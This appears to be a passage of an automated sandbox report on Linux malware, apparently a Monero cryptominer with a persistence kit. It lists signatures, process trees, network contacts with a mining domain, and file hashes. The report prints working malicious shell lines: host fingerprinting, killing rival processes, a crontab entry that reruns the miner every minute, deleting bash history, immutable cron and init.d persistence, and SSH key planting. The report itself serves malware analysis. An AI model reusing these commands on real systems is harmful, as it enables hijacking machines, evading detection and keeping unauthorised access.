File opened for modification /var/spool/cron/crontabs/tmp.NdujH4 /usr/bin/crontab N/A

Enumerates running processes

Reads hardware information

discovery
Description Indicator Process Target
File opened for reading /sys/devices/virtual/dmi/id/bios_date /tmp/.update/.x86_64 N/A
File opened for reading /sys/devices/virtual/dmi/id/product_serial /tmp/.update/.x86_64 N/A
File opened for reading /sys/devices/virtual/dmi/id/board_serial /tmp/.update/.x86_64 N/A
File opened for reading /sys/devices/virtual/dmi/id/bios_version /tmp/.update/.x86_64 N/A
File opened for reading /sys/devices/virtual/dmi/id/product_version /tmp/.update/.x86_64 N/A
File opened for reading /sys/devices/virtual/dmi/id/product_uuid /tmp/.update/.x86_64 N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_serial /tmp/.update/.x86_64 N/A
File opened for reading /sys/devices/virtual/dmi/id/board_name /tmp/.update/.x86_64 N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag /tmp/.update/.x86_64 N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_type /tmp/.update/.x86_64 N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_version /tmp/.update/.x86_64 N/A
File opened for reading /sys/devices/virtual/dmi/id/board_version /tmp/.update/.x86_64 N/A
File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag /tmp/.update/.x86_64 N/A
File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor /tmp/.update/.x86_64 N/A

Security Software Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/sh N/A
N/A N/A /bin/sh N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /tmp/.update/.x86_64 N/A
File opened for reading /proc/cpuinfo /usr/bin/grep N/A
File opened for reading /proc/cpuinfo /usr/bin/grep N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /tmp/.update/.x86_64 N/A
File opened for reading /sys/devices/system/cpu/types /tmp/.update/.x86_64 N/A
File opened for reading /sys/devices/system/cpu/possible /tmp/.update/.x86_64 N/A

Enumerates kernel/hardware configuration

discovery
Description Indicator Process Target
File opened for reading /sys/bus/cpu/devices/cpu0/topology/die_cpus /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/type /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map /tmp/.update/.x86_64 N/A
File opened for reading /sys/devices/system/node/online /tmp/.update/.x86_64 N/A
File opened for reading /sys/firmware/dmi/tables/smbios_entry_point /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_cpus /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size /tmp/.update/.x86_64 N/A
File opened for reading /sys/kernel/mm/hugepages/hugepages-1048576kB/nr_hugepages /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/node/devices/node0/hugepages/hugepages-1048576kB/nr_hugepages /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/node/devices/node0/access1/initiators /tmp/.update/.x86_64 N/A
File opened for reading /sys/fs/cgroup/cgroup.controllers /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/coherency_line_size /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map /tmp/.update/.x86_64 N/A
File opened for reading /sys/kernel/mm/hugepages /tmp/.update/.x86_64 N/A
File opened for reading /sys/fs/cgroup/cpuset.mems.effective /tmp/.update/.x86_64 N/A
File opened for reading /sys/devices/virtual/dmi/id /tmp/.update/.x86_64 N/A
File opened for reading /sys/firmware/dmi/tables/DMI /tmp/.update/.x86_64 N/A
File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/type /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cpufreq/cpuinfo_max_freq /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size /tmp/.update/.x86_64 N/A
File opened for reading /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/node/devices/node0/hugepages /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/type /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/physical_line_partition /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/level /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/size /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/type /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index9/shared_cpu_map /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/node/devices/node0/meminfo /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/dax/devices/target_node /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/dax/target_node /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/node/devices/node0/access0/initiators/read_latency /tmp/.update/.x86_64 N/A
File opened for reading /sys/fs/cgroup/cpuset.cpus.effective /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/physical_package_id /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/shared_cpu_map /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/level /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/size /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/dax/devices /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_id /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/level /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/node/devices/node0/access0/initiators /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/node/devices/node0/access0/initiators/read_bandwidth /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/physical_line_partition /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index4/shared_cpu_map /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/node/devices/node0/cpumap /tmp/.update/.x86_64 N/A
File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/package_cpus /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cpufreq/base_frequency /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/level /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/size /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets /tmp/.update/.x86_64 N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition /tmp/.update/.x86_64 N/A

Process Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/ps N/A
N/A N/A /usr/bin/ps N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/21/stat /usr/bin/ps N/A
File opened for reading /proc/83/status /usr/bin/ps N/A
File opened for reading /proc/377/stat /usr/bin/ps N/A
File opened for reading /proc/872/cmdline /usr/bin/ps N/A
File opened for reading /proc/101/status /usr/bin/ps N/A
File opened for reading /proc/99/status /usr/bin/ps N/A
File opened for reading /proc/641/status /usr/bin/ps N/A
File opened for reading /proc/1557/status /usr/bin/ps N/A
File opened for reading /proc/1093/status /usr/bin/ps N/A
File opened for reading /proc/197/stat /usr/bin/ps N/A
File opened for reading /proc/963/cmdline /usr/bin/ps N/A
File opened for reading /proc/207/stat /usr/bin/ps N/A
File opened for reading /proc/553/status /usr/bin/ps N/A
File opened for reading /proc/119/status /usr/bin/ps N/A
File opened for reading /proc/1307/cmdline /usr/bin/ps N/A
File opened for reading /proc/1183/cmdline /usr/bin/ps N/A
File opened for reading /proc/86/status /usr/bin/ps N/A
File opened for reading /proc/209/stat /usr/bin/ps N/A
File opened for reading /proc/1221/status /usr/bin/ps N/A
File opened for reading /proc/209/status /usr/bin/ps N/A
File opened for reading /proc/412/status /usr/bin/ps N/A
File opened for reading /proc/12/status /usr/bin/ps N/A
File opened for reading /proc/14/status /usr/bin/ps N/A
File opened for reading /proc/27/status /usr/bin/ps N/A
File opened for reading /proc/1172/cmdline /usr/bin/ps N/A
File opened for reading /proc/self/maps /usr/bin/awk N/A
File opened for reading /proc/self/maps /usr/bin/awk N/A
File opened for reading /proc/1140/stat /usr/bin/ps N/A
File opened for reading /proc/78/cmdline /usr/bin/ps N/A
File opened for reading /proc/417/stat /usr/bin/ps N/A
File opened for reading /proc/1038/stat /usr/bin/ps N/A
File opened for reading /proc/16/status /usr/bin/ps N/A
File opened for reading /proc/638/status /usr/bin/ps N/A
File opened for reading /proc/991/status /usr/bin/ps N/A
File opened for reading /proc/90/status /usr/bin/ps N/A
File opened for reading /proc/845/cmdline /usr/bin/ps N/A
File opened for reading /proc/1342/status /usr/bin/ps N/A
File opened for reading /proc/1427/status /usr/bin/ps N/A
File opened for reading /proc/767/status /usr/bin/ps N/A
File opened for reading /proc/1163/stat /usr/bin/ps N/A
File opened for reading /proc/1637/stat /usr/bin/ps N/A
File opened for reading /proc/453/stat /usr/bin/ps N/A
File opened for reading /proc/1362/cmdline /usr/bin/ps N/A
File opened for reading /proc/209/stat /usr/bin/ps N/A
File opened for reading /proc/222/status /usr/bin/ps N/A
File opened for reading /proc/409/status /usr/bin/ps N/A
File opened for reading /proc/114/status /usr/bin/ps N/A
File opened for reading /proc/1124/status /usr/bin/ps N/A
File opened for reading /proc/5/stat /usr/bin/ps N/A
File opened for reading /proc/213/status /usr/bin/ps N/A
File opened for reading /proc/1013/cmdline /usr/bin/ps N/A
File opened for reading /proc/1245/status /usr/bin/ps N/A
File opened for reading /proc/767/cmdline /usr/bin/ps N/A
File opened for reading /proc/1013/stat /usr/bin/ps N/A
File opened for reading /proc/5/stat /usr/bin/ps N/A
File opened for reading /proc/1054/status /usr/bin/ps N/A
File opened for reading /proc/7/stat /usr/bin/ps N/A
File opened for reading /proc/991/cmdline /usr/bin/ps N/A
File opened for reading /proc/1162/stat /usr/bin/ps N/A
File opened for reading /proc/6/status /usr/bin/ps N/A
File opened for reading /proc/1560/cmdline /usr/bin/ps N/A
File opened for reading /proc/driver/nvidia/gpus /tmp/.update/.x86_64 N/A
File opened for reading /proc/94/status /usr/bin/ps N/A
File opened for reading /proc/415/cmdline /usr/bin/ps N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.update/.cron /bin/sh N/A
File opened for modification /tmp/.lock /tmp/.update/.x86_64 N/A

Processes

/tmp/.update/.x86_64

[/tmp/.update/.x86_64]

/bin/sh

[sh -c echo "[$(hostname=$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo $hostname | awk {'print $1'} 2>/dev/null)$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print "-"$2'} 2>/dev/null)][$(whoami 2>/dev/null)][$(hostname 2>/dev/null)][$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][$(X=$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/$//' 2>/dev/null); if [ $(echo $X 2>/dev/null | awk {'print $1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ $(echo $X 2>/dev/null | awk {'print $4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ $(echo $X 2>/dev/null | awk {'print $4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ $(echo $X 2>/dev/null | awk {'print $3'} 2>/dev/null) = 'CPU' ]; then echo $X 2>/dev/null | awk {'print $4'} 2>/dev/null; elif [ $(echo $X 2>/dev/null | awk {'print $4'} 2>/dev/null) = 'CPU' ]; then echo $X 2>/dev/null | awk {'print $3'} 2>/dev/null; elif [ $(echo $X 2>/dev/null | awk {'print $1'} 2>/dev/null) = 'AMD' ]; then echo $X 2>/dev/null | awk {'print $2" "$3" "$4'} 2>/dev/null; else echo $X 2>/dev/null; fi)]"]

/usr/bin/hostname

[hostname -I]

/usr/bin/awk

[awk {print $1}]

/usr/bin/awk

[awk {print "-"$2}]

/usr/bin/head

[head -n 1]

/usr/bin/grep

[grep Port ]

/usr/bin/cat

[cat /etc/ssh/sshd_config]

/usr/bin/whoami

[whoami]

/usr/bin/hostname

[hostname]

/usr/bin/grep

[grep -c ^processor /proc/cpuinfo]

/usr/bin/sed

[sed -e s/$//]

/usr/bin/sed

[sed -e s/^ *//]

/usr/bin/cut

[cut -d: -f2]

/usr/bin/grep

[grep -m 1 model name /proc/cpuinfo]

/usr/bin/awk

[awk {print $1}]

/usr/bin/awk

[awk {print $4}]

/usr/bin/awk

[awk {print $4}]

/usr/bin/awk

[awk {print $3}]

/usr/bin/awk

[awk {print $4}]

/usr/bin/awk

[awk {print $1}]

/usr/bin/awk

[awk {print $2" "$3" "$4}]

/bin/sh

[sh -c ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[$2]++ {print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done fi]

/usr/bin/awk

[awk /[zZ]/ && !a[$2]++ {print $2}]

/usr/bin/ps

[ps -A -ostat,ppid]

/usr/bin/id

[id -u]

/usr/bin/grep

[grep -v grep]

/usr/bin/grep

[grep /etc/cron]

/usr/bin/ps

[ps x]

/bin/sh

[sh -c if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done fi]

/usr/bin/id

[id -u]

/usr/bin/awk

[awk {if($3>30.0) print $2}]

/usr/bin/grep

[grep -v /usr/sbin/httpd]

/usr/bin/grep

[grep -v -- -bash[[:space:]]*$]

/usr/bin/grep

[grep -v grep]

/usr/bin/ps

[ps aux]

/bin/sh

[sh -c dir=`pwd 2>/dev/null`;rm -rf $dir/.cron 2>/dev/null;crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep -v '/tmp/.update/.x86_64' 2>/dev/null > .cron 2>/dev/null;echo '* * * * * '$dir/'/tmp/.update/.x86_64' >> .cron 2>/dev/null; if [ $(crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep '/tmp/.update/.x86_64$' 2>/dev/null | sort 2>/dev/null | uniq 2>/dev/null | wc -l 2>/dev/null) -eq '0' ]; then crontab $dir/.cron 2>/dev/null; fi;rm -rf $dir/.cron 2>/dev/null]

/usr/bin/rm

[rm -rf /tmp/.update/.cron]

/usr/bin/grep

[grep -v /tmp/.update/.x86_64]

/usr/bin/grep

[grep -v grep]

/usr/bin/crontab

[crontab -l]

/usr/bin/wc

[wc -l]

/usr/bin/uniq

[uniq]

/usr/bin/sort

[sort]

/usr/bin/grep

[grep /tmp/.update/.x86_64$]

/usr/bin/grep

[grep -v grep]

/usr/bin/crontab

[crontab -l]

/usr/bin/crontab

[crontab /tmp/.update/.cron]

/usr/bin/rm

[rm -rf /tmp/.update/.cron]

/bin/sh

[sh -c if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*$' 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*$' 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u $myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*$' 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u $myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*$' 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done fi fi]

/usr/bin/id

[id -u]

/usr/bin/wc

[wc -l]

/usr/bin/awk

[awk {if($3>30.0) print $2}]

/usr/bin/grep

[grep -- -bash[[:space:]]*$]

/usr/bin/grep

[grep -v grep]

/usr/bin/ps

[ps aux]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 xmr-rx0.pwndns.pw udp
US 8.8.8.8:53 xmr-rx0.pwndns.pw udp
US 137.184.223.223:80 xmr-rx0.pwndns.pw tcp

Files

memory/1561-1-0x00007f1992cec000-0x00007f19933aad40-memory.dmp

/tmp/.update/.cron

MD5 d9da11a4b232a0003f710416ca81b6dd
SHA1 0ef01cf8be696a94f0c20223dc85f68cbc9038c1
SHA256 1842334260d8c3c1b5278c7ffcb6e8bae750cafcdfe41d7c40e5faa9d26e72ee
SHA512 b7f72c07c53aac4cea28e15d678ce70de3cea04928afa7b6f2e835fefaf40462879cfa7c941f0d0f47ac1b6ff50a6e54072d3f980f93279f0f86118ac98f4e32

/var/spool/cron/crontabs/tmp.NdujH4

MD5 dbbe047a01305ffcd7927d8a56c55eb1
SHA1 1c7db54bf5706ef8df444e4d7535b6f32dd5f96d
SHA256 63d9f82a6a2fe9b6e17112df9bccf53a931add1ec27f01a47e7af9024dafe670
SHA512 8e5263187070b7236bcbda6b18c9b2f2546b37135e019cd2011028d7d36cccf76d402cde20f9ff7510ffff20b7568d7899cdc9a375f348b3ebb9cc584c9ed1a0

Analysis: behavioral12

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:39

Platform

debian9-armhf-20240418-en

Max time kernel

0s

Command Line

[/tmp/.systemd/clean]

Signatures

N/A

Processes

/tmp/.systemd/clean

[/tmp/.systemd/clean]

/bin/uname

[uname -m]

/bin/rm

[rm -rf systemd.d systemd.dir auth auto clean .run go ntpdate]

/bin/rm

[rm -rf /root/.bash_history]

Network

N/A

Files

N/A

Analysis: behavioral22

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:39

Platform

debian9-mipsel-20240418-en

Max time kernel

3s

Command Line

[/tmp/.systemd/ntpdate]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /etc/cron.hourly/ntpdate /usr/bin/tee N/A
File opened for modification /etc/cron.monthly/ntpdate /usr/bin/tee N/A
File opened for modification /etc/cron.weekly/ntpdate /usr/bin/tee N/A
File opened for modification /etc/cron.d/ntpdate /usr/bin/tee N/A
File opened for modification /etc/cron.daily/ntpdate /usr/bin/tee N/A

Modifies init.d

persistence
Description Indicator Process Target
File opened for modification /etc/init.d/ntpdate /usr/bin/tee N/A

Writes file to system bin folder

Description Indicator Process Target
File opened for modification /sbin/lntpdate /usr/bin/tee N/A
File opened for modification /sbin/entpdate /usr/bin/tee N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/filesystems /bin/cp N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/cp N/A
N/A N/A /bin/cp N/A
N/A N/A /bin/cp N/A
N/A N/A /bin/cp N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.systemd/systemd.dir /tmp/.systemd/ntpdate N/A

Processes

/tmp/.systemd/ntpdate

[/tmp/.systemd/ntpdate]

/bin/uname

[uname -m]

/bin/cat

[cat systemd.dir]

/bin/mkdir

[mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly]

/usr/bin/chattr

[chattr -i -a /etc/cron.*/ntpdate /sbin/bcrond]

/bin/rm

[rm -rf /sbin/bcrond]

/bin/cp

[cp -f -r -- /tmp/.systemd/.mips /sbin/bcrond]

/usr/bin/tee

[tee -a /etc/cron.d/ntpdate /etc/cron.daily/ntpdate /etc/cron.hourly/ntpdate /etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate]

/bin/chmod

[chmod +x /etc/cron.daily/ntpdate /etc/cron.d/ntpdate /etc/cron.hourly/ntpdate /etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate /sbin/bcrond]

/usr/bin/chattr

[chattr +i +a /etc/cron.daily/ntpdate /etc/cron.d/ntpdate /etc/cron.hourly/ntpdate /etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate /sbin/bcrond]

/usr/bin/chattr

[chattr -a -i /sbin/bsysd]

/bin/rm

[rm -rf /sbin/bsysd]

/usr/bin/which

[which systemctl]

/usr/bin/chattr

[chattr -i -a /sbin/entpdate /sbin/bsysde]

/bin/rm

[rm -rf /sbin/bsysde]

/bin/cp

[cp -f -r -- /tmp/.systemd/.mips /sbin/bsysde]

/usr/bin/tee

[tee -a /sbin/entpdate]

/bin/chmod

[chmod +x /sbin/entpdate]

/usr/bin/chattr

[chattr +i +a /sbin/entpdate /sbin/bsysde]

/usr/bin/which

[which systemctl]

/usr/bin/chattr

[chattr -i -a /sbin/lntpdate /sbin/bsysdl]

/bin/rm

[rm -rf /sbin/bsysdl]

/bin/cp

[cp -f -r -- /tmp/.systemd/.mips /sbin/bsysdl]

/usr/bin/tee

[tee -a /sbin/lntpdate]

/bin/chmod

[chmod +x /sbin/lntpdate]

/usr/bin/chattr

[chattr +i +a /sbin/lntpdate /sbin/bsysdl]

/usr/bin/which

[which update-rc.d]

/usr/bin/chattr

[chattr -i -a /etc/init.d/ntpdate /sbin/binitd]

/bin/rm

[rm -rf /sbin/binitd]

/bin/cp

[cp -f -r -- /tmp/.systemd/.mips /sbin/binitd]

/usr/bin/tee

[tee -a /etc/init.d/ntpdate]

/bin/chmod

[chmod +x /etc/init.d/ntpdate /sbin/binitd]

/usr/bin/chattr

[chattr +i +a /etc/init.d/ntpdate /sbin/binitd]

/usr/bin/which

[which chkconfig]

Network

N/A

Files

/tmp/.systemd/systemd.dir

MD5 1f3a48ead214b69a4e5bbcc12a732ddb
SHA1 3391a93f27a805c58de438e5a50267af13b619ab
SHA256 8ebe6ec5aee16e2d6ea3fe45a22e72ad8f936a83a7fc9e82591885bcb45e322c
SHA512 386b19da83f4b8416d17960a3c0832b38521a3396dbf99501dcf03811e17d1696b18db4131f66375889afc2c44d791dd62239a86d3ba0fa614b8547480a7381d

/etc/cron.d/ntpdate

MD5 755700d11d59e0daeb4f6452aee1ad5d
SHA1 6b1194921376bef9c7559629712772a11e78eaa4
SHA256 1b311adac81faa8f9bf687306192ff84c2ee12a9337dd1051c55004ce39a2b00
SHA512 446f3d05218fa12190dadd2f405345b9a5581221064314e8bce54b155c08ad9bdba17d15f6959e5eb987baaffa309cfb19bf92a1a944d580f66419060a44b2b7

/sbin/entpdate

MD5 4aeb6335d69473274691f59dc2096cfe
SHA1 440755e42aa67c6ab3e636aeb1e8ec9463cd7ffc
SHA256 87095fcf498e832162baa13ecd28367155d8a1b5d02aee9ec1b60e149a871785
SHA512 23b0ef7f02e090cae5b7c20f8b06f4c450e6e8ddc49f3df9c49d223aa2df36339bb92df56e4609240d5e2066ee328db0abebd38de4b3eef304e83e72f4f1886c

/sbin/lntpdate

MD5 3748e897538baafbc7b260b4d2fbc98f
SHA1 41d179e3cfc4c1820ea2c0fed0d50009564db79b
SHA256 ebcbd097cd86e990591360d56f077f37de35fd6f4ce222c6d286f2f7e1024cc7
SHA512 23519c47db8c96ed72be6833778013df9199bb6d243e989fca2a75dd55d2a5aca37228fc19b0e2537cb5e10a27d69815edc5b640c8e878d7e767559904eaccea

/etc/init.d/ntpdate

MD5 bd99a962d94b5b4c32f8b7c8ca1f9ea9
SHA1 af33dc04d1f16e5ccceb2c0569b26e45bb65b32b
SHA256 64e489965b3914b15f92dadd851560e95287a40923b6cc93849e0758cdbf8b28
SHA512 fc2f81575bab833e76f070a45c3b9a1a32bb3c19084166c0beed3d03694d38295f6761af1599169f84a2c6f4b8c8bd8e1d8230796191de84dda52edd6899cdfa

Analysis: behavioral25

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:39

Platform

debian9-armhf-20240729-en

Max time kernel

0s

Command Line

[/tmp/.update/.run]

Signatures

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.update/update.dir /tmp/.update/.run N/A
File opened for modification /tmp/.update/.update /tmp/.update/.run N/A

Processes

/tmp/.update/.run

[/tmp/.update/.run]

/bin/uname

[uname -m]

/bin/cat

[cat update.dir]

/tmp/.update/.armv7l

[./.armv7l -f]

Network

N/A

Files

/tmp/.update/update.dir

MD5 f162d09e078b8201089b7e20ea72f2bf
SHA1 f7da8700cd21e201f62a17992d2ac15c09c447a1
SHA256 2162d6f6fadf44bb1db38ea55ec80a7006c269061de5141bf9f4743ec9cd95fb
SHA512 adb0481faeeb35926c8ba2bf2549e7b43dc40864ebfb8c40274d5021dfc3d87a8c2c2aa2996a28068c061ae13c404e85e870a23a67a709b4522134ce2be221cb

/tmp/.update/.update

MD5 144c1506f2865d421680f10562c63251
SHA1 a66615eec6e36d204170e45cd5bab05280f61a17
SHA256 c36f0bd30acee23f4eeabc05598d5365df341c0372a68c935c30ff94d379f032
SHA512 2a2099e1a4fe4a86f1710934ec398d1dbdae1c0b9c04502af383318163d06d27f40dd9c6581a541ee11f36b743aaf127474ee244d224bfe5929f0c33c32eccd5

Analysis: behavioral30

Detonation Overview

Submitted

2024-11-08 11:36

Reported

2024-11-08 11:40

Platform

debian9-armhf-20240611-en

Max time kernel

4s

Command Line

[/tmp/.update/auth]

Signatures

Adds new SSH keys

persistence privilege_escalation
Description Indicator Process Target
File opened for modification /home/user/.ssh/authorized_keys /tmp/.update/auth N/A
File opened for modification /root/.ssh/authorized_keys /tmp/.update/auth N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/filesystems /bin/sed N/A
File opened for reading /proc/filesystems /bin/mkdir N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.update/authusers /tmp/.update/auth N/A

Processes

/tmp/.update/auth

[/tmp/.update/auth]

/bin/uname

[uname -n]

/bin/mkdir

[mkdir /root/.ssh]

/bin/chmod

[chmod 0700 /root/.ssh]

/bin/chmod

[chmod 0644 /root/.ssh/authorized_keys]

/usr/bin/chattr

[chattr +ai /root/.ssh /root/.ssh/authorized_keys]

/bin/rm

[rm -rf authusers]

/bin/cat

[cat /etc/passwd]

/bin/grep

[grep -e /bin/sh -e /bin/bash]

/usr/bin/cut

[cut -d : -f 1]

